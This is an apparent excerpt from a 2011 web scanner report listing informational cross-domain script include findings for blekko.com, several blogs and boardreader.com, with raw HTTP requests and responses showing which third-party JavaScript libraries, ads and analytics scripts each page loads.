<script src="http://player.ooyala.com/player.js?embedCode=90cmtrMTom9vae2YoUwJrngW3UCgI2Zu&height=310&deepLinkEmbedCode=90cmtrMTom9vae2YoUwJrngW3UCgI2Zu&width=551"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://a.blekko-img.com/045/c096e0b5cfcc911c_blekko.js"></script>
<script type="text/javascript" src="http://a.blekko-img.com/045/2d59ccdc20e73672_jquery.json-2.2.min.js"></script>
<script type="text/javascript" src="http://a.blekko-img.com/045/78f7e6ce9fb86183_search.js"></script>
...[SNIP]...

18.31. http://blekko.com/ws/http:/2mdn.net/%20/domain previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/http:/2mdn.net/%20/domain

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.blekko-img.com/045/2d59ccdc20e73672_jquery.json-2.2.min.js
http://a.blekko-img.com/045/78f7e6ce9fb86183_search.js
http://a.blekko-img.com/045/c096e0b5cfcc911c_blekko.js

Request

GET /ws/http:/2mdn.net/%20/domain HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:18:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:18:45 GMT
Set-Cookie: v=1; path=/; expires=Sat, 30 Jan 2021 19:18:45 GMT
Set-Cookie: sessionid=351987218; path=/
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 21340
X-Blekko-QF: cq
X-Blekko-PT: c23ae2e4011dc5b7731a309d44a19bea

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
</script>
<script type="text/javascript" src="http://a.blekko-img.com/045/c096e0b5cfcc911c_blekko.js"></script>
<script type="text/javascript" src="http://a.blekko-img.com/045/2d59ccdc20e73672_jquery.json-2.2.min.js"></script>
<script type="text/javascript" src="http://a.blekko-img.com/045/78f7e6ce9fb86183_search.js"></script>
...[SNIP]...

18.32. http://blekko.com/ws/xss previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.blekko-img.com/045/gz/2d59ccdc20e73672_jquery.json-2.2.min.js
http://a.blekko-img.com/045/gz/78f7e6ce9fb86183_search.js
http://a.blekko-img.com/045/gz/c096e0b5cfcc911c_blekko.js

Request

GET /ws/xss HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/xss+/cwe-79
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionid=352926924; fbl=2; v=2; suggestedSlashtagsList=1; t=1296674585452

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:22:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:22:12 GMT
Set-Cookie: v=3; path=/; expires=Sat, 30 Jan 2021 19:22:12 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
X-Blekko-QF: chq
X-Blekko-PT: d024c35ae2164eed97ad9d7cc38772c6
Content-Length: 77319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
</div>
<script type="text/javascript" src="http://a.blekko-img.com/045/gz/c096e0b5cfcc911c_blekko.js"></script>
<script type="text/javascript" src="http://a.blekko-img.com/045/gz/2d59ccdc20e73672_jquery.json-2.2.min.js"></script>
<script type="text/javascript" src="http://a.blekko-img.com/045/gz/78f7e6ce9fb86183_search.js"></script>
...[SNIP]...

18.33. http://blekko.com/ws/xss+/cwe-79 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/cwe-79

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.blekko-img.com/045/gz/2d59ccdc20e73672_jquery.json-2.2.min.js
http://a.blekko-img.com/045/gz/78f7e6ce9fb86183_search.js
http://a.blekko-img.com/045/gz/c096e0b5cfcc911c_blekko.js

Request

GET /ws/xss+/cwe-79 HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fbl=2; v=1; sessionid=352926924; t=1296674566580

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:21:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:21:54 GMT
Set-Cookie: v=2; path=/; expires=Sat, 30 Jan 2021 19:21:54 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
X-Blekko-QF: Qhq
X-Blekko-PT: bbab9f6cbe67c6b1c09fc04b5d3f41ad
Content-Length: 77463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
</div>
<script type="text/javascript" src="http://a.blekko-img.com/045/gz/c096e0b5cfcc911c_blekko.js"></script>
<script type="text/javascript" src="http://a.blekko-img.com/045/gz/2d59ccdc20e73672_jquery.json-2.2.min.js"></script>
<script type="text/javascript" src="http://a.blekko-img.com/045/gz/78f7e6ce9fb86183_search.js"></script>
...[SNIP]...

18.34. http://blekko.com/ws/xss+cloudscan previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+cloudscan

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.blekko-img.com/045/gz/2d59ccdc20e73672_jquery.json-2.2.min.js
http://a.blekko-img.com/045/gz/78f7e6ce9fb86183_search.js
http://a.blekko-img.com/045/gz/c096e0b5cfcc911c_blekko.js

Request

GET /ws/xss+cloudscan HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/xss
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionid=352926924; suggestedSlashtagsList=1; fbl=2; v=3; t=1296674604621

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:22:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:22:32 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
X-Blekko-QF: chq
X-Blekko-PT: 46f15bab916658fa28037f06b2027cd1
Content-Length: 61284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
</div>
<script type="text/javascript" src="http://a.blekko-img.com/045/gz/c096e0b5cfcc911c_blekko.js"></script>
<script type="text/javascript" src="http://a.blekko-img.com/045/gz/2d59ccdc20e73672_jquery.json-2.2.min.js"></script>
<script type="text/javascript" src="http://a.blekko-img.com/045/gz/78f7e6ce9fb86183_search.js"></script>
...[SNIP]...

18.35. http://blekko.com/ws/xss+cloudscan+/flickr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+cloudscan+/flickr

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.blekko-img.com/045/2d59ccdc20e73672_jquery.json-2.2.min.js
http://a.blekko-img.com/045/78f7e6ce9fb86183_search.js
http://a.blekko-img.com/045/c096e0b5cfcc911c_blekko.js

Request

GET /ws/xss+cloudscan+/flickr HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:40:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:40:46 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 20826
X-Blekko-PT: a927963c8a7c34c02274dd823e34379b

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
</script>
<script type="text/javascript" src="http://a.blekko-img.com/045/c096e0b5cfcc911c_blekko.js"></script>
<script type="text/javascript" src="http://a.blekko-img.com/045/2d59ccdc20e73672_jquery.json-2.2.min.js"></script>
<script type="text/javascript" src="http://a.blekko-img.com/045/78f7e6ce9fb86183_search.js"></script>
...[SNIP]...

18.36. https://blekko.com/join previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://blekko.com
Path:	/join

Issue detail

The response dynamically includes the following scripts from other domains:

https://connect.facebook.net/en_US/all.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/2d59ccdc20e73672_jquery.json-2.2.min.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/66e687887728028f_jsbn.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/6f6e31bd3dcc5626_rng.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/78f7e6ce9fb86183_search.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/8256cf84549b97c3_base64.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/a6c23cd1d0714d29_jquery.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/eda7f3f0a9246dd3_rsa.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/eed7f85792e9ea39_prng4.js

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 20:06:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=115
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 20:06:34 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
X-Blekko-PT: a4bc8c52ab18861138b16f665a6e92c7
Content-Length: 7287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="https://www.facebook.com/2008/fbml">
...[SNIP]...
<link rel="stylesheet" type="text/css" href="https://d1ptqnnggq4xie.cloudfront.net/045/gz/theme19/40a3770253c50b9a_style.css" media="all" />
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/a6c23cd1d0714d29_jquery.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/2d59ccdc20e73672_jquery.json-2.2.min.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/66e687887728028f_jsbn.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/eed7f85792e9ea39_prng4.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/6f6e31bd3dcc5626_rng.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/eda7f3f0a9246dd3_rsa.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/8256cf84549b97c3_base64.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/78f7e6ce9fb86183_search.js"></script>
...[SNIP]...
</div>
<script src="https://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

18.37. https://blekko.com/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://blekko.com
Path:	/login

Issue detail

The response dynamically includes the following scripts from other domains:

https://connect.facebook.net/en_US/all.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/0fbbe2b7b6753520_jquery.jcryption.min.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/2d59ccdc20e73672_jquery.json-2.2.min.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/66e687887728028f_jsbn.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/6f6e31bd3dcc5626_rng.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/78f7e6ce9fb86183_search.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/8256cf84549b97c3_base64.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/a6c23cd1d0714d29_jquery.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/eda7f3f0a9246dd3_rsa.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/eed7f85792e9ea39_prng4.js

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 20:06:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=115
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 20:06:48 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
X-Blekko-PT: b2866cae1b02fce515a02450be725ffd
Content-Length: 10603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="https://www.facebook.com/2008/fbml">
...[SNIP]...
<link rel="stylesheet" type="text/css" href="https://d1ptqnnggq4xie.cloudfront.net/045/gz/theme19/40a3770253c50b9a_style.css" media="all" />
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/a6c23cd1d0714d29_jquery.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/2d59ccdc20e73672_jquery.json-2.2.min.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/0fbbe2b7b6753520_jquery.jcryption.min.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/66e687887728028f_jsbn.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/eed7f85792e9ea39_prng4.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/6f6e31bd3dcc5626_rng.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/eda7f3f0a9246dd3_rsa.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/8256cf84549b97c3_base64.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/78f7e6ce9fb86183_search.js"></script>
...[SNIP]...
</div>
<script src="https://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

18.38. http://blog.facebook.com/blog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.facebook.com
Path:	/blog.php

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

GET /blog.php HTTP/1.1
Host: blog.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.39. http://blog.facebook.com/blog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.facebook.com
Path:	/blog.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

GET /blog.php?post=382978412130 HTTP/1.1
Host: blog.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.40. http://blog.pothoven.net/2007/12/aborting-ajax-requests-for-prototypejs.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pothoven.net
Path:	/2007/12/aborting-ajax-requests-for-prototypejs.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.0.2/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/dragdrop.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/effects.js
http://digg.com/tools/diggthis.js
http://mapstats.blogflux.com/button.js.php?id=27319
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://spa.snap.com/snap_preview_anywhere.js?ap=1&key=e242a82a294569fb26b93ebd6c609482&sb=0&th=asphalt&cl=1&si=0&oi=0&domain=pothoven.blogspot.com&platform=blogger
http://static.woopra.com/js/woopra.v2.js
http://twitter.com/javascripts/blogger.js
http://twitter.com/statuses/user_timeline/pothoven.json?callback=twitterCallback2&count=1
http://www.blogger.com/static/v1/widgets/283664639-widgets.js

Request

GET /2007/12/aborting-ajax-requests-for-prototypejs.html HTTP/1.1
Host: blog.pothoven.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: blogger_TID=43020bbf40d733a9; HttpOnly
Expires: Tue, 01 Feb 2011 15:30:28 GMT
Date: Tue, 01 Feb 2011 15:30:28 GMT
Cache-Control: private
Last-Modified: Tue, 01 Feb 2011 15:25:36 GMT
ETag: "9dca5b84-78b8-4d71-afe6-996ede320ffc"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmln
...[SNIP]...
<script src='http://getfirebug.com/releases/lite/1.2/firebug-lite-compressed.js' type='text/javascript'/> -->
<script src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.0.2/prototype.js' type='text/javascript'></script>
<script src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/effects.js'></script>
<script src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/dragdrop.js'></script>
...[SNIP]...
</div>
<script src='http://twitter.com/javascripts/blogger.js' type='text/javascript'></script>
<script src='http://twitter.com/statuses/user_timeline/pothoven.json?callback=twitterCallback2&count=1' type='text/javascript'></script>
...[SNIP]...
</script>
<script src='http://pagead2.googlesyndication.com/pagead/show_ads.js' type='text/javascript'>
</script>
...[SNIP]...
</script>
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js"
type="text/javascript">
</script>
...[SNIP]...
</script>
<script src='http://digg.com/tools/diggthis.js' type='text/javascript'></script>
...[SNIP]...
</script>
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js"
type="text/javascript">
</script>
...[SNIP]...
<div class='widget-content'>
<script id="snap_preview_anywhere" src="http://spa.snap.com/snap_preview_anywhere.js?ap=1&key=e242a82a294569fb26b93ebd6c609482&sb=0&th=asphalt&cl=1&si=0&oi=0&domain=pothoven.blogspot.com&platform=blogger" defer="defer" type="text/javascript"></script>
...[SNIP]...
</a>
<script src="http://mapstats.blogflux.com/button.js.php?id=27319" language="JavaScript" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="//static.woopra.com/js/woopra.v2.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/283664639-widgets.js"></script>
...[SNIP]...

18.41. http://blog.robtex.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.robtex.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.blogger.com/static/v1/widgets/283664639-widgets.js

Request

GET / HTTP/1.1
Host: blog.robtex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Wed, 02 Feb 2011 19:18:46 GMT
Date: Wed, 02 Feb 2011 19:18:46 GMT
Last-Modified: Sat, 25 Dec 2010 14:47:35 GMT
ETag: "2996dc59-2c8a-4c19-82a0-2c6e8ea92f75"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Age: 0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/g
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/283664639-widgets.js"></script>
...[SNIP]...

18.42. http://blog.threatexpert.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.threatexpert.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.blogger.com/static/v1/widgets/283664639-widgets.js

Request

GET / HTTP/1.1
Host: blog.threatexpert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Wed, 02 Feb 2011 19:18:46 GMT
Date: Wed, 02 Feb 2011 19:18:46 GMT
Last-Modified: Sun, 16 Jan 2011 23:51:06 GMT
ETag: "43c6de0f-207e-40ef-9cd3-d5ab5e8339e0"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Age: 0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/g
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/283664639-widgets.js"></script>
...[SNIP]...

18.43. http://blog.twitter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.twitter.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://widgets.twimg.com/j/2/widget.js
http://www.blogger.com/static/v1/widgets/283664639-widgets.js
http://www.flickr.com/badge_code_v2.gne?count=5&display=latest&size=s&layout=h&source=user&user=34178660@N03
http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: blog.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Wed, 02 Feb 2011 19:18:47 GMT
Date: Wed, 02 Feb 2011 19:18:47 GMT
Last-Modified: Fri, 28 Jan 2011 23:26:25 GMT
ETag: "ada24045-088d-4536-92e6-18e694aa3f4e"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Age: 0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/g
...[SNIP]...
</style>
<script src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js' type='text/javascript'></script>
...[SNIP]...
</h2>
<script src='http://widgets.twimg.com/j/2/widget.js'></script>
...[SNIP]...
<div class='flickr'><script src='http://www.flickr.com/badge_code_v2.gne?count=5&display=latest&size=s&layout=h&source=user&user=34178660@N03' type='text/javascript'></script>
...[SNIP]...
</script>
<script src='http://www.google-analytics.com/urchin.js' type='text/javascript'></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/283664639-widgets.js"></script>
...[SNIP]...

18.44. http://boardreader.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:58:49 GMT
Server: Apache
Pragma:
Cache-Control: no-store, max-age=21600
Expires: Thu, 03 Feb 2011 12:58:49 +0000
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 332
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verify-v
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.45. http://boardreader.com/a/2mdn.net/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/a/2mdn.net/x22

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://www.google-analytics.com/urchin.js

Request

GET /a/2mdn.net/x22 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:51:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verify-v
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.46. http://boardreader.com/domain.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://www.google-analytics.com/urchin.js

Request

GET /domain.php HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

